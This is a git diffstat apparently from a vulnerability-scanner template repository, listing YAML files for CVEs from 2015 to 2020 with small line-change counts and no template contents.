http/cves/2015/CVE-2015-4694.yaml | 5 +++-- http/cves/2015/CVE-2015-5354.yaml | 5 +++-- http/cves/2015/CVE-2015-5461.yaml | 5 +++-- http/cves/2015/CVE-2015-5469.yaml | 5 +++-- http/cves/2015/CVE-2015-5471.yaml | 5 +++-- http/cves/2015/CVE-2015-5531.yaml | 5 +++-- http/cves/2015/CVE-2015-5688.yaml | 5 +++-- http/cves/2015/CVE-2015-6477.yaml | 5 +++-- http/cves/2015/CVE-2015-6544.yaml | 5 +++-- http/cves/2015/CVE-2015-6920.yaml | 5 +++-- http/cves/2015/CVE-2015-7245.yaml | 5 +++-- http/cves/2015/CVE-2015-7377.yaml | 5 +++-- http/cves/2015/CVE-2015-7450.yaml | 3 ++- http/cves/2015/CVE-2015-7780.yaml | 5 +++-- http/cves/2015/CVE-2015-7823.yaml | 5 +++-- http/cves/2015/CVE-2015-8349.yaml | 5 +++-- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 5 +++-- http/cves/2015/CVE-2015-9312.yaml | 5 +++-- http/cves/2015/CVE-2015-9323.yaml | 5 +++-- http/cves/2015/CVE-2015-9414.yaml | 5 +++-- http/cves/2015/CVE-2015-9480.yaml | 5 +++-- http/cves/2016/CVE-2016-0957.yaml | 5 +++-- http/cves/2016/CVE-2016-1000126.yaml | 5 +++-- http/cves/2016/CVE-2016-1000127.yaml | 5 +++-- http/cves/2016/CVE-2016-1000128.yaml | 5 +++-- http/cves/2016/CVE-2016-1000129.yaml | 5 +++-- http/cves/2016/CVE-2016-1000130.yaml | 5 +++-- http/cves/2016/CVE-2016-1000131.yaml | 5 +++-- http/cves/2016/CVE-2016-1000132.yaml | 5 +++-- http/cves/2016/CVE-2016-1000133.yaml | 5 +++-- http/cves/2016/CVE-2016-1000134.yaml | 5 +++-- http/cves/2016/CVE-2016-1000135.yaml | 5 +++-- http/cves/2016/CVE-2016-1000136.yaml | 5 +++-- http/cves/2016/CVE-2016-1000137.yaml | 5 +++-- http/cves/2016/CVE-2016-1000138.yaml | 5 +++-- http/cves/2016/CVE-2016-1000139.yaml | 5 +++-- http/cves/2016/CVE-2016-1000140.yaml | 5 +++-- http/cves/2016/CVE-2016-1000141.yaml | 5 +++-- http/cves/2016/CVE-2016-1000142.yaml | 5 +++-- http/cves/2016/CVE-2016-1000143.yaml | 5 +++-- http/cves/2016/CVE-2016-1000146.yaml | 5 +++-- http/cves/2016/CVE-2016-1000148.yaml | 5 +++-- http/cves/2016/CVE-2016-1000149.yaml | 5 +++-- http/cves/2016/CVE-2016-1000152.yaml | 5 +++-- http/cves/2016/CVE-2016-1000153.yaml | 5 +++-- http/cves/2016/CVE-2016-1000154.yaml | 5 +++-- http/cves/2016/CVE-2016-1000155.yaml | 5 +++-- http/cves/2016/CVE-2016-10033.yaml | 3 ++- http/cves/2016/CVE-2016-10108.yaml | 5 +++-- http/cves/2016/CVE-2016-10134.yaml | 5 +++-- http/cves/2016/CVE-2016-10367.yaml | 5 +++-- http/cves/2016/CVE-2016-10368.yaml | 5 +++-- http/cves/2016/CVE-2016-10924.yaml | 5 +++-- http/cves/2016/CVE-2016-10940.yaml | 5 +++-- http/cves/2016/CVE-2016-10956.yaml | 5 +++-- http/cves/2016/CVE-2016-10960.yaml | 5 +++-- http/cves/2016/CVE-2016-10973.yaml | 5 +++-- http/cves/2016/CVE-2016-10993.yaml | 5 +++-- http/cves/2016/CVE-2016-1555.yaml | 3 ++- http/cves/2016/CVE-2016-2389.yaml | 5 +++-- http/cves/2016/CVE-2016-3088.yaml | 5 +++-- http/cves/2016/CVE-2016-3978.yaml | 5 +++-- http/cves/2016/CVE-2016-4437.yaml | 3 ++- http/cves/2016/CVE-2016-4975.yaml | 5 +++-- http/cves/2016/CVE-2016-4977.yaml | 5 +++-- http/cves/2016/CVE-2016-5649.yaml | 5 +++-- http/cves/2016/CVE-2016-6195.yaml | 5 +++-- http/cves/2016/CVE-2016-6277.yaml | 3 ++- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 5 +++-- http/cves/2016/CVE-2016-7981.yaml | 5 +++-- http/cves/2016/CVE-2016-8527.yaml | 5 +++-- http/cves/2017/CVE-2017-0929.yaml | 5 +++-- http/cves/2017/CVE-2017-1000029.yaml | 5 +++-- http/cves/2017/CVE-2017-1000163.yaml | 5 +++-- http/cves/2017/CVE-2017-1000170.yaml | 5 +++-- http/cves/2017/CVE-2017-1000486.yaml | 5 +++-- http/cves/2017/CVE-2017-10075.yaml | 5 +++-- http/cves/2017/CVE-2017-10974.yaml | 3 ++- http/cves/2017/CVE-2017-11165.yaml | 5 +++-- http/cves/2017/CVE-2017-11444.yaml | 5 +++-- http/cves/2017/CVE-2017-11512.yaml | 5 +++-- http/cves/2017/CVE-2017-11586.yaml | 5 +++-- http/cves/2017/CVE-2017-11629.yaml | 5 +++-- http/cves/2017/CVE-2017-12138.yaml | 5 +++-- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 3 ++- http/cves/2017/CVE-2017-12544.yaml | 5 +++-- http/cves/2017/CVE-2017-12583.yaml | 5 +++-- http/cves/2017/CVE-2017-12615.yaml | 3 ++- http/cves/2017/CVE-2017-12617.yaml | 3 ++- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 5 +++-- http/cves/2017/CVE-2017-12794.yaml | 5 +++-- http/cves/2017/CVE-2017-14135.yaml | 5 +++-- http/cves/2017/CVE-2017-14186.yaml | 5 +++-- http/cves/2017/CVE-2017-14524.yaml | 5 +++-- http/cves/2017/CVE-2017-14535.yaml | 5 +++-- http/cves/2017/CVE-2017-14537.yaml | 5 +++-- http/cves/2017/CVE-2017-14622.yaml | 5 +++-- http/cves/2017/CVE-2017-14651.yaml | 5 +++-- http/cves/2017/CVE-2017-14849.yaml | 5 +++-- http/cves/2017/CVE-2017-15287.yaml | 5 +++-- http/cves/2017/CVE-2017-15363.yaml | 5 +++-- http/cves/2017/CVE-2017-15647.yaml | 5 +++-- http/cves/2017/CVE-2017-15715.yaml | 5 +++-- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 5 +++-- http/cves/2017/CVE-2017-16877.yaml | 5 +++-- http/cves/2017/CVE-2017-16894.yaml | 5 +++-- http/cves/2017/CVE-2017-17043.yaml | 5 +++-- http/cves/2017/CVE-2017-17059.yaml | 5 +++-- http/cves/2017/CVE-2017-17451.yaml | 5 +++-- http/cves/2017/CVE-2017-17731.yaml | 5 +++-- http/cves/2017/CVE-2017-17736.yaml | 5 +++-- http/cves/2017/CVE-2017-18024.yaml | 5 +++-- http/cves/2017/CVE-2017-18487.yaml | 5 +++-- http/cves/2017/CVE-2017-18490.yaml | 5 +++-- http/cves/2017/CVE-2017-18491.yaml | 5 +++-- http/cves/2017/CVE-2017-18492.yaml | 5 +++-- http/cves/2017/CVE-2017-18493.yaml | 5 +++-- http/cves/2017/CVE-2017-18494.yaml | 5 +++-- http/cves/2017/CVE-2017-18496.yaml | 5 +++-- http/cves/2017/CVE-2017-18500.yaml | 5 +++-- http/cves/2017/CVE-2017-18501.yaml | 5 +++-- http/cves/2017/CVE-2017-18502.yaml | 5 +++-- http/cves/2017/CVE-2017-18505.yaml | 5 +++-- http/cves/2017/CVE-2017-18516.yaml | 5 +++-- http/cves/2017/CVE-2017-18517.yaml | 5 +++-- http/cves/2017/CVE-2017-18518.yaml | 5 +++-- http/cves/2017/CVE-2017-18527.yaml | 5 +++-- http/cves/2017/CVE-2017-18528.yaml | 5 +++-- http/cves/2017/CVE-2017-18529.yaml | 5 +++-- http/cves/2017/CVE-2017-18530.yaml | 5 +++-- http/cves/2017/CVE-2017-18532.yaml | 5 +++-- http/cves/2017/CVE-2017-18536.yaml | 5 +++-- http/cves/2017/CVE-2017-18537.yaml | 5 +++-- http/cves/2017/CVE-2017-18542.yaml | 5 +++-- http/cves/2017/CVE-2017-18556.yaml | 5 +++-- http/cves/2017/CVE-2017-18557.yaml | 5 +++-- http/cves/2017/CVE-2017-18558.yaml | 5 +++-- http/cves/2017/CVE-2017-18562.yaml | 5 +++-- http/cves/2017/CVE-2017-18564.yaml | 5 +++-- http/cves/2017/CVE-2017-18565.yaml | 5 +++-- http/cves/2017/CVE-2017-18566.yaml | 5 +++-- http/cves/2017/CVE-2017-18598.yaml | 5 +++-- http/cves/2017/CVE-2017-18638.yaml | 5 +++-- http/cves/2017/CVE-2017-3506.yaml | 5 +++-- http/cves/2017/CVE-2017-3528.yaml | 5 +++-- http/cves/2017/CVE-2017-4011.yaml | 5 +++-- http/cves/2017/CVE-2017-5487.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 3 ++- http/cves/2017/CVE-2017-5631.yaml | 5 +++-- http/cves/2017/CVE-2017-5982.yaml | 5 +++-- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 5 +++-- http/cves/2017/CVE-2017-7391.yaml | 5 +++-- http/cves/2017/CVE-2017-7615.yaml | 3 ++- http/cves/2017/CVE-2017-7921.yaml | 5 +++-- http/cves/2017/CVE-2017-7925.yaml | 7 ++++--- http/cves/2017/CVE-2017-8229.yaml | 5 +++-- http/cves/2017/CVE-2017-9140.yaml | 5 +++-- http/cves/2017/CVE-2017-9288.yaml | 5 +++-- http/cves/2017/CVE-2017-9416.yaml | 5 +++-- http/cves/2017/CVE-2017-9506.yaml | 5 +++-- http/cves/2017/CVE-2017-9822.yaml | 3 ++- http/cves/2017/CVE-2017-9833.yaml | 5 +++-- http/cves/2017/CVE-2017-9841.yaml | 3 ++- http/cves/2018/CVE-2018-0127.yaml | 5 +++-- http/cves/2018/CVE-2018-0296.yaml | 3 ++- http/cves/2018/CVE-2018-1000129.yaml | 5 +++-- http/cves/2018/CVE-2018-1000130.yaml | 5 +++-- http/cves/2018/CVE-2018-1000226.yaml | 5 +++-- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 5 +++-- http/cves/2018/CVE-2018-1000671.yaml | 5 +++-- http/cves/2018/CVE-2018-1000856.yaml | 5 +++-- http/cves/2018/CVE-2018-1000861.yaml | 5 +++-- http/cves/2018/CVE-2018-10093.yaml | 5 +++-- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 5 +++-- http/cves/2018/CVE-2018-10201.yaml | 5 +++-- http/cves/2018/CVE-2018-10230.yaml | 5 +++-- http/cves/2018/CVE-2018-10562.yaml | 3 ++- http/cves/2018/CVE-2018-10822.yaml | 5 +++-- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 5 +++-- http/cves/2018/CVE-2018-11227.yaml | 5 +++-- http/cves/2018/CVE-2018-11231.yaml | 5 +++-- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 5 +++-- http/cves/2018/CVE-2018-11709.yaml | 5 +++-- http/cves/2018/CVE-2018-11784.yaml | 5 +++-- http/cves/2018/CVE-2018-12031.yaml | 5 +++-- http/cves/2018/CVE-2018-12054.yaml | 5 +++-- http/cves/2018/CVE-2018-1207.yaml | 5 +++-- http/cves/2018/CVE-2018-12095.yaml | 5 +++-- http/cves/2018/CVE-2018-12296.yaml | 5 +++-- http/cves/2018/CVE-2018-12300.yaml | 5 +++-- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 5 +++-- http/cves/2018/CVE-2018-1271.yaml | 5 +++-- http/cves/2018/CVE-2018-1273.yaml | 3 ++- http/cves/2018/CVE-2018-12909.yaml | 5 +++-- http/cves/2018/CVE-2018-12998.yaml | 5 +++-- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 5 +++-- http/cves/2018/CVE-2018-13980.yaml | 5 +++-- http/cves/2018/CVE-2018-14013.yaml | 5 +++-- http/cves/2018/CVE-2018-14064.yaml | 5 +++-- http/cves/2018/CVE-2018-14474.yaml | 5 +++-- http/cves/2018/CVE-2018-14574.yaml | 5 +++-- http/cves/2018/CVE-2018-14728.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 5 +++-- http/cves/2018/CVE-2018-14916.yaml | 5 +++-- http/cves/2018/CVE-2018-14918.yaml | 5 +++-- http/cves/2018/CVE-2018-14931.yaml | 5 +++-- http/cves/2018/CVE-2018-15138.yaml | 5 +++-- http/cves/2018/CVE-2018-15517.yaml | 5 +++-- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 5 +++-- http/cves/2018/CVE-2018-15917.yaml | 5 +++-- http/cves/2018/CVE-2018-16059.yaml | 5 +++-- http/cves/2018/CVE-2018-16133.yaml | 5 +++-- http/cves/2018/CVE-2018-16139.yaml | 5 +++-- http/cves/2018/CVE-2018-16159.yaml | 5 +++-- http/cves/2018/CVE-2018-16283.yaml | 5 +++-- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 5 +++-- http/cves/2018/CVE-2018-16668.yaml | 5 +++-- http/cves/2018/CVE-2018-16670.yaml | 5 +++-- http/cves/2018/CVE-2018-16671.yaml | 5 +++-- http/cves/2018/CVE-2018-16716.yaml | 5 +++-- http/cves/2018/CVE-2018-16761.yaml | 5 +++-- http/cves/2018/CVE-2018-16763.yaml | 5 +++-- http/cves/2018/CVE-2018-16836.yaml | 5 +++-- http/cves/2018/CVE-2018-16979.yaml | 5 +++-- http/cves/2018/CVE-2018-17153.yaml | 5 +++-- http/cves/2018/CVE-2018-17246.yaml | 5 +++-- http/cves/2018/CVE-2018-17254.yaml | 5 +++-- http/cves/2018/CVE-2018-17422.yaml | 5 +++-- http/cves/2018/CVE-2018-17431.yaml | 5 +++-- http/cves/2018/CVE-2018-18069.yaml | 5 +++-- http/cves/2018/CVE-2018-18264.yaml | 3 ++- http/cves/2018/CVE-2018-18323.yaml | 5 +++-- http/cves/2018/CVE-2018-18570.yaml | 5 +++-- http/cves/2018/CVE-2018-18608.yaml | 5 +++-- http/cves/2018/CVE-2018-18775.yaml | 5 +++-- http/cves/2018/CVE-2018-18777.yaml | 5 +++-- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 5 +++-- http/cves/2018/CVE-2018-18925.yaml | 5 +++-- http/cves/2018/CVE-2018-19136.yaml | 5 +++-- http/cves/2018/CVE-2018-19137.yaml | 5 +++-- http/cves/2018/CVE-2018-19287.yaml | 5 +++-- http/cves/2018/CVE-2018-19326.yaml | 5 +++-- http/cves/2018/CVE-2018-19365.yaml | 5 +++-- http/cves/2018/CVE-2018-19386.yaml | 5 +++-- http/cves/2018/CVE-2018-19439.yaml | 5 +++-- http/cves/2018/CVE-2018-19458.yaml | 5 +++-- http/cves/2018/CVE-2018-19749.yaml | 5 +++-- http/cves/2018/CVE-2018-19751.yaml | 5 +++-- http/cves/2018/CVE-2018-19752.yaml | 5 +++-- http/cves/2018/CVE-2018-19753.yaml | 5 +++-- http/cves/2018/CVE-2018-19877.yaml | 5 +++-- http/cves/2018/CVE-2018-19892.yaml | 5 +++-- http/cves/2018/CVE-2018-19914.yaml | 5 +++-- http/cves/2018/CVE-2018-19915.yaml | 5 +++-- http/cves/2018/CVE-2018-20009.yaml | 5 +++-- http/cves/2018/CVE-2018-20010.yaml | 5 +++-- http/cves/2018/CVE-2018-20011.yaml | 5 +++-- http/cves/2018/CVE-2018-20462.yaml | 5 +++-- http/cves/2018/CVE-2018-20463.yaml | 5 +++-- http/cves/2018/CVE-2018-20470.yaml | 5 +++-- http/cves/2018/CVE-2018-20526.yaml | 5 +++-- http/cves/2018/CVE-2018-20608.yaml | 5 +++-- http/cves/2018/CVE-2018-20824.yaml | 5 +++-- http/cves/2018/CVE-2018-20985.yaml | 5 +++-- http/cves/2018/CVE-2018-2392.yaml | 4 ++-- http/cves/2018/CVE-2018-2791.yaml | 5 +++-- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 5 +++-- http/cves/2018/CVE-2018-3238.yaml | 5 +++-- http/cves/2018/CVE-2018-3714.yaml | 5 +++-- http/cves/2018/CVE-2018-3760.yaml | 5 +++-- http/cves/2018/CVE-2018-3810.yaml | 5 +++-- http/cves/2018/CVE-2018-5230.yaml | 5 +++-- http/cves/2018/CVE-2018-5233.yaml | 5 +++-- http/cves/2018/CVE-2018-5316.yaml | 5 +++-- http/cves/2018/CVE-2018-5715.yaml | 5 +++-- http/cves/2018/CVE-2018-6008.yaml | 5 +++-- http/cves/2018/CVE-2018-6184.yaml | 5 +++-- http/cves/2018/CVE-2018-6200.yaml | 5 +++-- http/cves/2018/CVE-2018-6530.yaml | 5 +++-- http/cves/2018/CVE-2018-6910.yaml | 5 +++-- http/cves/2018/CVE-2018-7251.yaml | 5 +++-- http/cves/2018/CVE-2018-7282.yaml | 5 +++-- http/cves/2018/CVE-2018-7422.yaml | 5 +++-- http/cves/2018/CVE-2018-7467.yaml | 5 +++-- http/cves/2018/CVE-2018-7490.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 3 ++- http/cves/2018/CVE-2018-7653.yaml | 5 +++-- http/cves/2018/CVE-2018-7662.yaml | 5 +++-- http/cves/2018/CVE-2018-7700.yaml | 5 +++-- http/cves/2018/CVE-2018-7719.yaml | 5 +++-- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 5 +++-- http/cves/2018/CVE-2018-8715.yaml | 5 +++-- http/cves/2018/CVE-2018-8719.yaml | 5 +++-- http/cves/2018/CVE-2018-8727.yaml | 5 +++-- http/cves/2018/CVE-2018-8770.yaml | 5 +++-- http/cves/2018/CVE-2018-9118.yaml | 5 +++-- http/cves/2018/CVE-2018-9161.yaml | 5 +++-- http/cves/2018/CVE-2018-9205.yaml | 5 +++-- http/cves/2018/CVE-2018-9845.yaml | 5 +++-- http/cves/2018/CVE-2018-9995.yaml | 5 +++-- http/cves/2019/CVE-2019-0193.yaml | 5 +++-- http/cves/2019/CVE-2019-0221.yaml | 5 +++-- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 3 ++- http/cves/2019/CVE-2019-10092.yaml | 5 +++-- http/cves/2019/CVE-2019-10098.yaml | 5 +++-- http/cves/2019/CVE-2019-1010287.yaml | 5 +++-- http/cves/2019/CVE-2019-1010290.yaml | 5 +++-- http/cves/2019/CVE-2019-10232.yaml | 5 +++-- http/cves/2019/CVE-2019-10405.yaml | 5 +++-- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 5 +++-- http/cves/2019/CVE-2019-10758.yaml | 3 ++- http/cves/2019/CVE-2019-11013.yaml | 5 +++-- http/cves/2019/CVE-2019-11248.yaml | 5 +++-- http/cves/2019/CVE-2019-11370.yaml | 5 +++-- http/cves/2019/CVE-2019-11580.yaml | 3 ++- http/cves/2019/CVE-2019-11581.yaml | 3 ++- http/cves/2019/CVE-2019-11869.yaml | 5 +++-- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 5 +++-- http/cves/2019/CVE-2019-12461.yaml | 5 +++-- http/cves/2019/CVE-2019-12581.yaml | 5 +++-- http/cves/2019/CVE-2019-12583.yaml | 5 +++-- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 5 +++-- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 5 +++-- http/cves/2019/CVE-2019-12990.yaml | 5 +++-- http/cves/2019/CVE-2019-13101.yaml | 5 +++-- http/cves/2019/CVE-2019-13392.yaml | 5 +++-- http/cves/2019/CVE-2019-13396.yaml | 5 +++-- http/cves/2019/CVE-2019-13462.yaml | 5 +++-- http/cves/2019/CVE-2019-14205.yaml | 5 +++-- http/cves/2019/CVE-2019-14223.yaml | 5 +++-- http/cves/2019/CVE-2019-14251.yaml | 5 +++-- http/cves/2019/CVE-2019-14312.yaml | 5 +++-- http/cves/2019/CVE-2019-14322.yaml | 5 +++-- http/cves/2019/CVE-2019-14470.yaml | 5 +++-- http/cves/2019/CVE-2019-14530.yaml | 5 +++-- http/cves/2019/CVE-2019-14696.yaml | 5 +++-- http/cves/2019/CVE-2019-14750.yaml | 5 +++-- http/cves/2019/CVE-2019-14789.yaml | 5 +++-- http/cves/2019/CVE-2019-14974.yaml | 5 +++-- http/cves/2019/CVE-2019-15043.yaml | 5 +++-- http/cves/2019/CVE-2019-15107.yaml | 3 ++- http/cves/2019/CVE-2019-15501.yaml | 5 +++-- http/cves/2019/CVE-2019-15642.yaml | 5 +++-- http/cves/2019/CVE-2019-15713.yaml | 5 +++-- http/cves/2019/CVE-2019-15811.yaml | 5 +++-- http/cves/2019/CVE-2019-15829.yaml | 5 +++-- http/cves/2019/CVE-2019-15858.yaml | 5 +++-- http/cves/2019/CVE-2019-15859.yaml | 5 +++-- http/cves/2019/CVE-2019-15889.yaml | 5 +++-- http/cves/2019/CVE-2019-16097.yaml | 5 +++-- http/cves/2019/CVE-2019-16123.yaml | 5 +++-- http/cves/2019/CVE-2019-16278.yaml | 5 +++-- http/cves/2019/CVE-2019-16313.yaml | 5 +++-- http/cves/2019/CVE-2019-16332.yaml | 5 +++-- http/cves/2019/CVE-2019-16525.yaml | 5 +++-- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 5 +++-- http/cves/2019/CVE-2019-16932.yaml | 5 +++-- http/cves/2019/CVE-2019-16996.yaml | 5 +++-- http/cves/2019/CVE-2019-16997.yaml | 5 +++-- http/cves/2019/CVE-2019-17270.yaml | 5 +++-- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 5 +++-- http/cves/2019/CVE-2019-17444.yaml | 5 +++-- http/cves/2019/CVE-2019-17503.yaml | 5 +++-- http/cves/2019/CVE-2019-17506.yaml | 5 +++-- http/cves/2019/CVE-2019-17538.yaml | 5 +++-- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 5 +++-- http/cves/2019/CVE-2019-17662.yaml | 5 +++-- http/cves/2019/CVE-2019-1821.yaml | 5 +++-- http/cves/2019/CVE-2019-18371.yaml | 5 +++-- http/cves/2019/CVE-2019-18393.yaml | 5 +++-- http/cves/2019/CVE-2019-18394.yaml | 5 +++-- http/cves/2019/CVE-2019-18665.yaml | 5 +++-- http/cves/2019/CVE-2019-18818.yaml | 5 +++-- http/cves/2019/CVE-2019-18922.yaml | 5 +++-- http/cves/2019/CVE-2019-18957.yaml | 5 +++-- http/cves/2019/CVE-2019-1898.yaml | 5 +++-- http/cves/2019/CVE-2019-19134.yaml | 5 +++-- http/cves/2019/CVE-2019-19368.yaml | 5 +++-- http/cves/2019/CVE-2019-1943.yaml | 5 +++-- http/cves/2019/CVE-2019-19824.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 5 +++-- http/cves/2019/CVE-2019-19985.yaml | 5 +++-- http/cves/2019/CVE-2019-20085.yaml | 5 +++-- http/cves/2019/CVE-2019-20141.yaml | 5 +++-- http/cves/2019/CVE-2019-20183.yaml | 5 +++-- http/cves/2019/CVE-2019-20210.yaml | 5 +++-- http/cves/2019/CVE-2019-20224.yaml | 5 +++-- http/cves/2019/CVE-2019-20933.yaml | 5 +++-- http/cves/2019/CVE-2019-2578.yaml | 5 +++-- http/cves/2019/CVE-2019-2579.yaml | 5 +++-- http/cves/2019/CVE-2019-2588.yaml | 5 +++-- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 5 +++-- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 4 ++-- http/cves/2019/CVE-2019-3402.yaml | 5 +++-- http/cves/2019/CVE-2019-3403.yaml | 5 +++-- http/cves/2019/CVE-2019-3799.yaml | 5 +++-- http/cves/2019/CVE-2019-3911.yaml | 5 +++-- http/cves/2019/CVE-2019-3912.yaml | 5 +++-- http/cves/2019/CVE-2019-3929.yaml | 5 +++-- http/cves/2019/CVE-2019-5434.yaml | 5 +++-- http/cves/2019/CVE-2019-6112.yaml | 5 +++-- http/cves/2019/CVE-2019-6340.yaml | 3 ++- http/cves/2019/CVE-2019-6715.yaml | 5 +++-- http/cves/2019/CVE-2019-6799.yaml | 5 +++-- http/cves/2019/CVE-2019-6802.yaml | 5 +++-- http/cves/2019/CVE-2019-7192.yaml | 5 +++-- http/cves/2019/CVE-2019-7219.yaml | 5 +++-- http/cves/2019/CVE-2019-7238.yaml | 3 ++- http/cves/2019/CVE-2019-7254.yaml | 5 +++-- http/cves/2019/CVE-2019-7255.yaml | 5 +++-- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 5 +++-- http/cves/2019/CVE-2019-7315.yaml | 5 +++-- http/cves/2019/CVE-2019-7481.yaml | 5 +++-- http/cves/2019/CVE-2019-7543.yaml | 5 +++-- http/cves/2019/CVE-2019-7609.yaml | 5 +++-- http/cves/2019/CVE-2019-8086.yaml | 5 +++-- http/cves/2019/CVE-2019-8390.yaml | 5 +++-- http/cves/2019/CVE-2019-8442.yaml | 5 +++-- http/cves/2019/CVE-2019-8446.yaml | 5 +++-- http/cves/2019/CVE-2019-8449.yaml | 5 +++-- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 5 +++-- http/cves/2019/CVE-2019-8937.yaml | 5 +++-- http/cves/2019/CVE-2019-8982.yaml | 5 +++-- http/cves/2019/CVE-2019-9041.yaml | 5 +++-- http/cves/2019/CVE-2019-9618.yaml | 5 +++-- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 5 +++-- http/cves/2019/CVE-2019-9733.yaml | 5 +++-- http/cves/2019/CVE-2019-9915.yaml | 5 +++-- http/cves/2019/CVE-2019-9922.yaml | 5 +++-- http/cves/2019/CVE-2019-9955.yaml | 5 +++-- http/cves/2020/CVE-2020-10199.yaml | 3 ++- http/cves/2020/CVE-2020-10220.yaml | 5 +++-- http/cves/2020/CVE-2020-10546.yaml | 5 +++-- http/cves/2020/CVE-2020-10547.yaml | 5 +++-- http/cves/2020/CVE-2020-10548.yaml | 5 +++-- http/cves/2020/CVE-2020-10549.yaml | 5 +++-- http/cves/2020/CVE-2020-10770.yaml | 5 +++-- http/cves/2020/CVE-2020-10973.yaml | 5 +++-- http/cves/2020/CVE-2020-11034.yaml | 5 +++-- http/cves/2020/CVE-2020-11110.yaml | 5 +++-- http/cves/2020/CVE-2020-11450.yaml | 5 +++-- http/cves/2020/CVE-2020-11455.yaml | 5 +++-- http/cves/2020/CVE-2020-11529.yaml | 5 +++-- http/cves/2020/CVE-2020-11530.yaml | 5 +++-- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 5 +++-- http/cves/2020/CVE-2020-11710.yaml | 5 +++-- http/cves/2020/CVE-2020-11798.yaml | 5 +++-- http/cves/2020/CVE-2020-11853.yaml | 5 +++-- http/cves/2020/CVE-2020-11854.yaml | 3 ++- http/cves/2020/CVE-2020-11930.yaml | 5 +++-- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 5 +++-- http/cves/2020/CVE-2020-12054.yaml | 5 +++-- http/cves/2020/CVE-2020-12127.yaml | 5 +++-- http/cves/2020/CVE-2020-12256.yaml | 5 +++-- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 5 +++-- http/cves/2020/CVE-2020-12478.yaml | 5 +++-- http/cves/2020/CVE-2020-12720.yaml | 5 +++-- http/cves/2020/CVE-2020-13117.yaml | 5 +++-- http/cves/2020/CVE-2020-13121.yaml | 5 +++-- http/cves/2020/CVE-2020-13158.yaml | 5 +++-- http/cves/2020/CVE-2020-13258.yaml | 5 +++-- http/cves/2020/CVE-2020-13379.yaml | 5 +++-- http/cves/2020/CVE-2020-13405.yaml | 5 +++-- http/cves/2020/CVE-2020-13483.yaml | 5 +++-- http/cves/2020/CVE-2020-13638.yaml | 5 +++-- http/cves/2020/CVE-2020-13700.yaml | 5 +++-- http/cves/2020/CVE-2020-13820.yaml | 5 +++-- http/cves/2020/CVE-2020-13851.yaml | 5 +++-- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 5 +++-- http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 5 +++-- http/cves/2020/CVE-2020-14092.yaml | 5 +++-- http/cves/2020/CVE-2020-14144.yaml | 5 +++-- http/cves/2020/CVE-2020-14179.yaml | 5 +++-- http/cves/2020/CVE-2020-14181.yaml | 3 ++- http/cves/2020/CVE-2020-14408.yaml | 5 +++-- http/cves/2020/CVE-2020-14413.yaml | 5 +++-- http/cves/2020/CVE-2020-14864.yaml | 5 +++-- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 5 +++-- http/cves/2020/CVE-2020-15129.yaml | 5 +++-- http/cves/2020/CVE-2020-15148.yaml | 5 +++-- http/cves/2020/CVE-2020-15227.yaml | 4 ++-- 